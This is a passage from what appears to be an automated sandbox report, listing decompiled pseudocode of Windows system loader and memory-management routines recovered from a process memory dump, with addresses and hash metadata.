                                                              								_t193 = E0101A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                              								 *(_t237 - 0x44) = _t193;
                                                              								__eflags = _t193;
                                                              								if(_t193 < 0) {
                                                              									L30:
                                                              									E00FFFFB0(_t193, _t235, 0x10d8550);
                                                              									__eflags = _t235 - _t237 - 0x38;
                                                              									if(_t235 != _t237 - 0x38) {
                                                              										_t235 =  *(_t237 - 0x48);
                                                              										L010077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                              									} else {
                                                              										_t235 =  *(_t237 - 0x48);
                                                              									}
                                                              									__eflags =  *(_t237 - 0x6c);
                                                              									if( *(_t237 - 0x6c) != 0) {
                                                              										L010077F0(_t235, _t236,  *(_t237 - 0x6c));
                                                              									}
                                                              									__eflags = _t193;
                                                              									if(_t193 >= 0) {
                                                              										goto L4;
                                                              									} else {
                                                              										goto L5;
                                                              									}
                                                              								}
                                                              								_t204 =  *0x10d7b04; // 0x1
                                                              								 *(_t235 + 8) = _t204;
                                                              								__eflags =  *((char*)(_t237 - 0x39));
                                                              								if( *((char*)(_t237 - 0x39)) != 0) {
                                                              									 *(_t235 + 4) = 1;
                                                              									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                              									_t161 =  *0x10d7b10; // 0x0
                                                              									 *(_t237 - 0x4c) = _t161;
                                                              								} else {
                                                              									 *(_t235 + 4) = _t236;
                                                              									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                              								}
                                                              								 *((intOrPtr*)(_t237 - 0x54)) = E010237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                              								_t224 = _t236;
                                                              								 *(_t237 - 0x40) = _t236;
                                                              								 *(_t237 - 0x50) = _t236;
                                                              								while(1) {
                                                              									_t163 =  *(_t235 + 8);
                                                              									__eflags = _t224 - _t163;
                                                              									if(_t224 >= _t163) {
                                                              										break;
                                                              									}
                                                              									_t228 =  *0x10d7b9c; // 0x0
                                                              									_t214 = L01004620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                              									 *(_t237 - 0x78) = _t214;
                                                              									__eflags = _t214;
                                                              									if(_t214 == 0) {
                                                              										L52:
                                                              										_t193 = 0xc0000017;
                                                              										L19:
                                                              										 *(_t237 - 0x44) = _t193;
                                                              										L20:
                                                              										_t206 =  *(_t237 - 0x40);
                                                              										__eflags = _t206;
                                                              										if(_t206 == 0) {
                                                              											L26:
                                                              											__eflags = _t193;
                                                              											if(_t193 < 0) {
                                                              												E010237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                              												__eflags =  *((char*)(_t237 - 0x39));
                                                              												if( *((char*)(_t237 - 0x39)) != 0) {
                                                              													 *0x10d7b10 =  *0x10d7b10 - 8;
                                                              												}
                                                              											} else {
                                                              												_t169 =  *(_t237 - 0x68);
                                                              												__eflags = _t169;
                                                              												if(_t169 != 0) {
                                                              													 *0x10d7b04 =  *0x10d7b04 - _t169;
                                                              												}
                                                              											}
                                                              											__eflags = _t193;
                                                              											if(_t193 >= 0) {
                                                              												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                              											}
                                                              											goto L30;
                                                              										}
                                                              										_t226 = _t206 * 0xc;
                                                              										__eflags = _t226;
                                                              										_t194 =  *(_t237 - 0x48);
                                                              										do {
                                                              											 *(_t237 - 0x40) = _t206 - 1;
                                                              											_t226 = _t226 - 0xc;
                                                              											 *(_t237 - 0x4c) = _t226;
                                                              											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                              											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                              												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                              												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                              													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                              													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                              													__eflags =  *((char*)(_t237 - 0x39));
                                                              													if( *((char*)(_t237 - 0x39)) == 0) {
                                                              														_t171 = _t210;
                                                              													} else {
                                                              														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                              														L010077F0(_t194, _t236, _t210 - 8);
                                                              														_t171 =  *(_t237 - 0x50);
                                                              													}
                                                              													L48:
                                                              													L010077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                              													L46:
                                                              													_t206 =  *(_t237 - 0x40);
                                                              													_t226 =  *(_t237 - 0x4c);
                                                              													goto L24;
                                                              												}
                                                              												 *0x10d7b08 =  *0x10d7b08 + 1;
                                                              												goto L24;
                                                              											}
                                                              											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                              											__eflags = _t171;
                                                              											if(_t171 != 0) {
                                                              												__eflags =  *((char*)(_t237 - 0x39));
                                                              												if( *((char*)(_t237 - 0x39)) == 0) {
                                                              													goto L48;
                                                              												}
                                                              												E010257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                              												goto L46;
                                                              											}
                                                              											L24:
                                                              											__eflags = _t206;
                                                              										} while (_t206 != 0);
                                                              										_t193 =  *(_t237 - 0x44);
                                                              										goto L26;
                                                              									}
                                                              									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                              									 *(_t237 - 0x7c) = _t232;
                                                              									 *(_t232 - 4) = _t214;
                                                              									 *(_t237 - 4) = _t236;
                                                              									E0102F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                              									_t238 = _t238 + 0xc;
                                                              									 *(_t237 - 4) = 0xfffffffe;
                                                              									_t215 =  *(_t237 - 0x48);
                                                              									__eflags = _t193;
                                                              									if(_t193 < 0) {
                                                              										L010077F0(_t215, _t236,  *(_t237 - 0x78));
                                                              										goto L20;
                                                              									}
                                                              									__eflags =  *((char*)(_t237 - 0x39));
                                                              									if( *((char*)(_t237 - 0x39)) != 0) {
                                                              										_t233 = E0101A44B( *(_t237 - 0x4c));
                                                              										 *(_t237 - 0x50) = _t233;
                                                              										__eflags = _t233;
                                                              										if(_t233 == 0) {
                                                              											L010077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                              											goto L52;
                                                              										}
                                                              										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                              										L17:
                                                              										_t234 =  *(_t237 - 0x40);
                                                              										_t218 = _t234 * 0xc;
                                                              										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                              										 *(_t218 + _t235 + 0x10) = _t236;
                                                              										_t224 = _t234 + 1;
                                                              										 *(_t237 - 0x40) = _t224;
                                                              										 *(_t237 - 0x50) = _t224;
                                                              										_t193 =  *(_t237 - 0x44);
                                                              										continue;
                                                              									}
                                                              									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                              									goto L17;
                                                              								}
                                                              								 *_t235 = _t236;
                                                              								_t165 = 0x10 + _t163 * 0xc;
                                                              								__eflags = _t165;
                                                              								_push(_t165);
                                                              								_push(_t235);
                                                              								_push(0x23);
                                                              								_push(0xffffffff);
                                                              								_t193 = E010296C0();
                                                              								goto L19;
                                                              							} else {
                                                              								goto L50;
                                                              							}
                                                              						}
                                                              						_t235 = _t237 - 0x38;
                                                              						 *(_t237 - 0x60) = _t235;
                                                              						goto L8;
                                                              					}
                                                              					goto L4;
                                                              				}
                                                              			}

































                                                              0x00ff86a8
                                                              0x01049bdf
                                                              0x01049bdf
                                                              0x00ff86ae
                                                              0x00ff86b0
                                                              0x00000000
                                                              0x00ff86b6
                                                              0x00000000
                                                              0x01049be9
                                                              0x00ff86b0
                                                              0x00ff8544
                                                              0x00ff854a
                                                              0x00ff854d
                                                              0x00ff8551
                                                              0x00ff876e
                                                              0x00ff8778
                                                              0x00ff877b
                                                              0x00ff8780
                                                              0x00ff8557
                                                              0x00ff8557
                                                              0x00ff855d
                                                              0x00ff855d
                                                              0x00ff856b
                                                              0x00ff856e
                                                              0x00ff8570
                                                              0x00ff8573
                                                              0x00ff8576
                                                              0x00ff8576
                                                              0x00ff8579
                                                              0x00ff857b
                                                              0x00000000
                                                              0x00000000
                                                              0x00ff8581
                                                              0x00ff85a0
                                                              0x00ff85a2
                                                              0x00ff85a5
                                                              0x00ff85a7
                                                              0x01049b1b
                                                              0x01049b1b
                                                              0x00ff862e
                                                              0x00ff862e
                                                              0x00ff8631
                                                              0x00ff8631
                                                              0x00ff8634
                                                              0x00ff8636
                                                              0x00ff8669
                                                              0x00ff8669
                                                              0x00ff866b
                                                              0x01049bbf
                                                              0x01049bc4
                                                              0x01049bc8
                                                              0x01049bce
                                                              0x01049bce
                                                              0x00ff8671
                                                              0x00ff8671
                                                              0x00ff8674
                                                              0x00ff8676
                                                              0x01049bae
                                                              0x01049bae
                                                              0x00ff8676
                                                              0x00ff867c
                                                              0x00ff867e
                                                              0x00ff8688
                                                              0x00ff8688
                                                              0x00000000
                                                              0x00ff867e
                                                              0x00ff8638
                                                              0x00ff8638
                                                              0x00ff863b
                                                              0x00ff863e
                                                              0x00ff863f
                                                              0x00ff8642
                                                              0x00ff8645
                                                              0x00ff8648
                                                              0x00ff864d
                                                              0x01049b69
                                                              0x01049b6e
                                                              0x01049b7b
                                                              0x01049b81
                                                              0x01049b85
                                                              0x01049b89
                                                              0x01049ba7
                                                              0x01049b8b
                                                              0x01049b91
                                                              0x01049b9a
                                                              0x01049b9f
                                                              0x01049b9f
                                                              0x00ff8788
                                                              0x00ff878d
                                                              0x00ff8763
                                                              0x00ff8763
                                                              0x00ff8766
                                                              0x00000000
                                                              0x00ff8766
                                                              0x01049b70
                                                              0x00000000
                                                              0x01049b70
                                                              0x00ff8656
                                                              0x00ff865a
                                                              0x00ff865c
                                                              0x00ff8752
                                                              0x00ff8756
                                                              0x00000000
                                                              0x00000000
                                                              0x00ff875e
                                                              0x00000000
                                                              0x00ff875e
                                                              0x00ff8662
                                                              0x00ff8662
                                                              0x00ff8662
                                                              0x00ff8666
                                                              0x00000000
                                                              0x00ff8666
                                                              0x00ff85b7
                                                              0x00ff85b9
                                                              0x00ff85bc
                                                              0x00ff85bf
                                                              0x00ff85cc
                                                              0x00ff85d1
                                                              0x00ff85d4
                                                              0x00ff85db
                                                              0x00ff85de
                                                              0x00ff85e0
                                                              0x01049b5f
                                                              0x00000000
                                                              0x01049b5f
                                                              0x00ff85e6
                                                              0x00ff85ea
                                                              0x00ff86c3
                                                              0x00ff86c5
                                                              0x00ff86c8
                                                              0x00ff86ca
                                                              0x01049b16
                                                              0x00000000
                                                              0x01049b16
                                                              0x00ff86d6
                                                              0x00ff85f6
                                                              0x00ff85f6
                                                              0x00ff85f9
                                                              0x00ff8602
                                                              0x00ff8606
                                                              0x00ff860a
                                                              0x00ff860b
                                                              0x00ff860e
                                                              0x00ff8611
                                                              0x00000000
                                                              0x00ff8611
                                                              0x00ff85f3
                                                              0x00000000
                                                              0x00ff85f3
                                                              0x00ff8619
                                                              0x00ff861e
                                                              0x00ff861e
                                                              0x00ff8621
                                                              0x00ff8622
                                                              0x00ff8623
                                                              0x00ff8625
                                                              0x00ff862c
                                                              0x00000000
                                                              0x00ff873d
                                                              0x00000000
                                                              0x00ff873d
                                                              0x00ff8737
                                                              0x00ff850f
                                                              0x00ff8512
                                                              0x00000000
                                                              0x00ff8512
                                                              0x00000000
                                                              0x00ff84d6

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
                                                              • Instruction ID: fe1b3f665e4d3a216fc5ee96dbba2d065b2203e1230272d9cfadc7591e037b1a
                                                              • Opcode Fuzzy Hash: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
                                                              • Instruction Fuzzy Hash: CBB18FB1E00209DFDB15DF98C984BAEBBB5BF48354F204129E645AB355DB74AC42DB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E0101513A(intOrPtr __ecx, void* __edx) {
                                                              				signed int _v8;
                                                              				signed char _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				char _v28;
                                                              				signed int _v32;
                                                              				signed int _v36;
                                                              				signed int _v40;
                                                              				intOrPtr _v44;
                                                              				intOrPtr _v48;
                                                              				char _v63;
                                                              				char _v64;
                                                              				signed int _v72;
                                                              				signed int _v76;
                                                              				signed int _v80;
                                                              				signed int _v84;
                                                              				signed int _v88;
                                                              				signed char* _v92;
                                                              				signed int _v100;
                                                              				signed int _v104;
                                                              				char _v105;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t157;
                                                              				signed int _t159;
                                                              				signed int _t160;
                                                              				unsigned int* _t161;
                                                              				intOrPtr _t165;
                                                              				signed int _t172;
                                                              				signed char* _t181;
                                                              				intOrPtr _t189;
                                                              				intOrPtr* _t200;
                                                              				signed int _t202;
                                                              				signed int _t203;
                                                              				char _t204;
                                                              				signed int _t207;
                                                              				signed int _t208;
                                                              				void* _t209;
                                                              				intOrPtr _t210;
                                                              				signed int _t212;
                                                              				signed int _t214;
                                                              				signed int _t221;
                                                              				signed int _t222;
                                                              				signed int _t226;
                                                              				intOrPtr* _t232;
                                                              				signed int _t233;
                                                              				signed int _t234;
                                                              				intOrPtr _t237;
                                                              				intOrPtr _t238;
                                                              				intOrPtr _t240;
                                                              				void* _t245;
                                                              				signed int _t246;
                                                              				signed int _t247;
                                                              				void* _t248;
                                                              				void* _t251;
                                                              				void* _t252;
                                                              				signed int _t253;
                                                              				signed int _t255;
                                                              				signed int _t256;
                                                              
                                                              				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                              				_v8 =  *0x10dd360 ^ _t255;
                                                              				_v32 = _v32 & 0x00000000;
                                                              				_t251 = __edx;
                                                              				_t237 = __ecx;
                                                              				_t212 = 6;
                                                              				_t245 =  &_v84;
                                                              				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                              				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                              				_v48 = __ecx;
                                                              				_v36 = _t207;
                                                              				_t157 = memset(_t245, 0, _t212 << 2);
                                                              				_t256 = _t255 + 0xc;
                                                              				_t246 = _t245 + _t212;
                                                              				if(_t207 == 2) {
                                                              					_t247 =  *(_t237 + 0x60);
                                                              					_t208 =  *(_t237 + 0x64);
                                                              					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                              					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                              					_v104 = _t159;
                                                              					_v76 = _t159;
                                                              					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                              					_v100 = _t160;
                                                              					_v72 = _t160;
                                                              					L19:
                                                              					_v80 = _t208;
                                                              					_v84 = _t247;
                                                              					L8:
                                                              					_t214 = 0;
                                                              					if( *(_t237 + 0x74) > 0) {
                                                              						_t82 = _t237 + 0x84; // 0x124
                                                              						_t161 = _t82;
                                                              						_v92 = _t161;
                                                              						while( *_t161 >> 0x1f != 0) {
                                                              							_t200 = _v92;
                                                              							if( *_t200 == 0x80000000) {
                                                              								break;
                                                              							}
                                                              							_t214 = _t214 + 1;
                                                              							_t161 = _t200 + 0x10;
                                                              							_v92 = _t161;
                                                              							if(_t214 <  *(_t237 + 0x74)) {
                                                              								continue;
                                                              							}
                                                              							goto L9;
                                                              						}
                                                              						_v88 = _t214 << 4;
                                                              						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                              						_t165 = 0;
                                                              						asm("adc eax, [ecx+edx+0x7c]");
                                                              						_v24 = _t165;
                                                              						_v28 = _v40;
                                                              						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                              						_t221 = _v40;
                                                              						_v16 =  *_v92;
                                                              						_v32 =  &_v28;
                                                              						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                              							goto L9;
                                                              						}
                                                              						_t240 = _v48;
                                                              						if( *_v92 != 0x80000000) {
                                                              							goto L9;
                                                              						}
                                                              						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                              						_t226 = 0;
                                                              						_t181 = _t251 + 0x66;
                                                              						_v88 = 0;
                                                              						_v92 = _t181;
                                                              						do {
                                                              							if( *((char*)(_t181 - 2)) == 0) {
                                                              								goto L31;
                                                              							}
                                                              							_t226 = _v88;
                                                              							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                              								_t181 = E0102D0F0(1, _t226 + 0x20, 0);
                                                              								_t226 = _v40;
                                                              								 *(_t226 + 8) = _t181;
                                                              								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                              								L34:
                                                              								if(_v44 == 0) {
                                                              									goto L9;
                                                              								}
                                                              								_t210 = _v44;
                                                              								_t127 = _t210 + 0x1c; // 0x1c
                                                              								_t249 = _t127;
                                                              								E01002280(_t181, _t127);
                                                              								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                              								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                              								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                              									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                              								}
                                                              								_t189 = L01004620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                              								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                              								if(_t189 != 0) {
                                                              									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                              									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                              									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                              									 *_t232 = _t232 + 0x10;
                                                              									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                              									E0102F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                              									_t256 = _t256 + 0xc;
                                                              								}
                                                              								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                              								E00FFFFB0(_t210, _t249, _t249);
                                                              								_t222 = _v76;
                                                              								_t172 = _v80;
                                                              								_t208 = _v84;
                                                              								_t247 = _v88;
                                                              								L10:
                                                              								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                              								_v44 = _t238;
                                                              								if(_t238 != 0) {
                                                              									 *0x10db1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                              									_v44();
                                                              								}
                                                              								_pop(_t248);
                                                              								_pop(_t252);
                                                              								_pop(_t209);
                                                              								return E0102B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                              							}
                                                              							_t181 = _v92;
                                                              							L31:
                                                              							_t226 = _t226 + 1;
                                                              							_t181 =  &(_t181[0x18]);
                                                              							_v88 = _t226;
                                                              							_v92 = _t181;
                                                              						} while (_t226 < 4);
                                                              						goto L34;
                                                              					}
                                                              					L9:
                                                              					_t172 = _v104;
                                                              					_t222 = _v100;
                                                              					goto L10;
                                                              				}
                                                              				_t247 = _t246 | 0xffffffff;
                                                              				_t208 = _t247;
                                                              				_v84 = _t247;
                                                              				_v80 = _t208;
                                                              				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                              					_t233 = _v72;
                                                              					_v105 = _v64;
                                                              					_t202 = _v76;
                                                              				} else {
                                                              					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                              					_v105 = 1;
                                                              					if(_v63 <= _t204) {
                                                              						_v63 = _t204;
                                                              					}
                                                              					_t202 = _v76 |  *(_t251 + 0x40);
                                                              					_t233 = _v72 |  *(_t251 + 0x44);
                                                              					_t247 =  *(_t251 + 0x38);
                                                              					_t208 =  *(_t251 + 0x3c);
                                                              					_v76 = _t202;
                                                              					_v72 = _t233;
                                                              					_v84 = _t247;
                                                              					_v80 = _t208;
                                                              				}
                                                              				_v104 = _t202;
                                                              				_v100 = _t233;
                                                              				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                              					_t237 = _v48;
                                                              					_v105 = 1;
                                                              					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                              						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                              						_t237 = _v48;
                                                              					}
                                                              					_t203 = _t202 |  *(_t251 + 0xb8);
                                                              					_t234 = _t233 |  *(_t251 + 0xbc);
                                                              					_t247 = _t247 &  *(_t251 + 0xb0);
                                                              					_t208 = _t208 &  *(_t251 + 0xb4);
                                                              					_v104 = _t203;
                                                              					_v76 = _t203;
                                                              					_v100 = _t234;
                                                              					_v72 = _t234;
                                                              					_v84 = _t247;
                                                              					_v80 = _t208;
                                                              				}
                                                              				if(_v105 == 0) {
                                                              					_v36 = _v36 & 0x00000000;
                                                              					_t208 = 0;
                                                              					_t247 = 0;
                                                              					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                              					goto L19;
                                                              				} else {
                                                              					_v36 = 1;
                                                              					goto L8;
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
                                                              • Instruction ID: 83049ef9dcb2c374849a235ed24b54e404256e4837f4472eb7aa50790d5caa2f
                                                              • Opcode Fuzzy Hash: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
                                                              • Instruction Fuzzy Hash: E8C130755093818FD394CF28C480A5AFBE1BF89304F544AAEF9D98B392D735E845CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 74%
                                                              			E010103E2(signed int __ecx, signed int __edx) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				signed int _v36;
                                                              				intOrPtr _v40;
                                                              				signed int _v44;
                                                              				signed int _v48;
                                                              				char _v52;
                                                              				char _v56;
                                                              				char _v64;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t56;
                                                              				signed int _t58;
                                                              				char* _t64;
                                                              				intOrPtr _t65;
                                                              				signed int _t74;
                                                              				signed int _t79;
                                                              				char* _t83;
                                                              				intOrPtr _t84;
                                                              				signed int _t93;
                                                              				signed int _t94;
                                                              				signed char* _t95;
                                                              				signed int _t99;
                                                              				signed int _t100;
                                                              				signed char* _t101;
                                                              				signed int _t105;
                                                              				signed int _t119;
                                                              				signed int _t120;
                                                              				void* _t122;
                                                              				signed int _t123;
                                                              				signed int _t127;
                                                              
                                                              				_v8 =  *0x10dd360 ^ _t127;
                                                              				_t119 = __ecx;
                                                              				_t105 = __edx;
                                                              				_t118 = 0;
                                                              				_v20 = __edx;
                                                              				_t120 =  *(__ecx + 0x20);
                                                              				if(E01010548(__ecx, 0) != 0) {
                                                              					_t56 = 0xc000022d;
                                                              					L23:
                                                              					return E0102B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                              				} else {
                                                              					_v12 = _v12 | 0xffffffff;
                                                              					_t58 = _t120 + 0x24;
                                                              					_t109 =  *(_t120 + 0x18);
                                                              					_t118 = _t58;
                                                              					_v16 = _t58;
                                                              					E00FFB02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                              					_v52 = 0x18;
                                                              					_v48 = 0;
                                                              					0x840 = 0x40;
                                                              					if( *0x10d7c1c != 0) {
                                                              					}
                                                              					_v40 = 0x840;
                                                              					_v44 = _t105;
                                                              					_v36 = 0;
                                                              					_v32 = 0;
                                                              					if(E01007D50() != 0) {
                                                              						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              					} else {
                                                              						_t64 = 0x7ffe0384;
                                                              					}
                                                              					if( *_t64 != 0) {
                                                              						_t65 =  *[fs:0x30];
                                                              						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                              						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                              							_t100 = E01007D50();
                                                              							__eflags = _t100;
                                                              							if(_t100 == 0) {
                                                              								_t101 = 0x7ffe0385;
                                                              							} else {
                                                              								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              							}
                                                              							__eflags =  *_t101 & 0x00000020;
                                                              							if(( *_t101 & 0x00000020) != 0) {
                                                              								_t118 = _t118 | 0xffffffff;
                                                              								_t109 = 0x1485;
                                                              								E01067016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                              							}
                                                              						}
                                                              					}
                                                              					_t105 = 0;
                                                              					while(1) {
                                                              						_push(0x60);
                                                              						_push(5);
                                                              						_push( &_v64);
                                                              						_push( &_v52);
                                                              						_push(0x100021);
                                                              						_push( &_v12);
                                                              						_t122 = E01029830();
                                                              						if(_t122 >= 0) {
                                                              							break;
                                                              						}
                                                              						__eflags = _t122 - 0xc0000034;
                                                              						if(_t122 == 0xc0000034) {
                                                              							L38:
                                                              							_t120 = 0xc0000135;
                                                              							break;
                                                              						}
                                                              						__eflags = _t122 - 0xc000003a;
                                                              						if(_t122 == 0xc000003a) {
                                                              							goto L38;
                                                              						}
                                                              						__eflags = _t122 - 0xc0000022;
                                                              						if(_t122 != 0xc0000022) {
                                                              							break;
                                                              						}
                                                              						__eflags = _t105;
                                                              						if(__eflags != 0) {
                                                              							break;
                                                              						}
                                                              						_t109 = _t119;
                                                              						_t99 = E010669A6(_t119, __eflags);
                                                              						__eflags = _t99;
                                                              						if(_t99 == 0) {
                                                              							break;
                                                              						}
                                                              						_t105 = _t105 + 1;
                                                              					}
                                                              					if( !_t120 >= 0) {
                                                              						L22:
                                                              						_t56 = _t120;
                                                              						goto L23;
                                                              					}
                                                              					if( *0x10d7c04 != 0) {
                                                              						_t118 = _v12;
                                                              						_t120 = E0106A7AC(_t119, _t118, _t109);
                                                              						__eflags = _t120;
                                                              						if(_t120 >= 0) {
                                                              							goto L10;
                                                              						}
                                                              						__eflags =  *0x10d7bd8;
                                                              						if( *0x10d7bd8 != 0) {
                                                              							L20:
                                                              							if(_v12 != 0xffffffff) {
                                                              								_push(_v12);
                                                              								E010295D0();
                                                              							}
                                                              							goto L22;
                                                              						}
                                                              					}
                                                              					L10:
                                                              					_push(_v12);
                                                              					_t105 = _t119 + 0xc;
                                                              					_push(0x1000000);
                                                              					_push(0x10);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0xf);
                                                              					_push(_t105);
                                                              					_t120 = E010299A0();
                                                              					if(_t120 < 0) {
                                                              						__eflags = _t120 - 0xc000047e;
                                                              						if(_t120 == 0xc000047e) {
                                                              							L51:
                                                              							_t74 = E01063540(_t120);
                                                              							_t119 = _v16;
                                                              							_t120 = _t74;
                                                              							L52:
                                                              							_t118 = 0x1485;
                                                              							E00FEB1E1(_t120, 0x1485, 0, _t119);
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _t120 - 0xc000047f;
                                                              						if(_t120 == 0xc000047f) {
                                                              							goto L51;
                                                              						}
                                                              						__eflags = _t120 - 0xc0000462;
                                                              						if(_t120 == 0xc0000462) {
                                                              							goto L51;
                                                              						}
                                                              						_t119 = _v16;
                                                              						__eflags = _t120 - 0xc0000017;
                                                              						if(_t120 != 0xc0000017) {
                                                              							__eflags = _t120 - 0xc000009a;
                                                              							if(_t120 != 0xc000009a) {
                                                              								__eflags = _t120 - 0xc000012d;
                                                              								if(_t120 != 0xc000012d) {
                                                              									_v28 = _t119;
                                                              									_push( &_v56);
                                                              									_push(1);
                                                              									_v24 = _t120;
                                                              									_push( &_v28);
                                                              									_push(1);
                                                              									_push(2);
                                                              									_push(0xc000007b);
                                                              									_t79 = E0102AAF0();
                                                              									__eflags = _t79;
                                                              									if(_t79 >= 0) {
                                                              										__eflags =  *0x10d8474 - 3;
                                                              										if( *0x10d8474 != 3) {
                                                              											 *0x10d79dc =  *0x10d79dc + 1;
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L52;
                                                              					}
                                                              					if(E01007D50() != 0) {
                                                              						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              					} else {
                                                              						_t83 = 0x7ffe0384;
                                                              					}
                                                              					if( *_t83 != 0) {
                                                              						_t84 =  *[fs:0x30];
                                                              						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                              						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                              							_t94 = E01007D50();
                                                              							__eflags = _t94;
                                                              							if(_t94 == 0) {
                                                              								_t95 = 0x7ffe0385;
                                                              							} else {
                                                              								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              							}
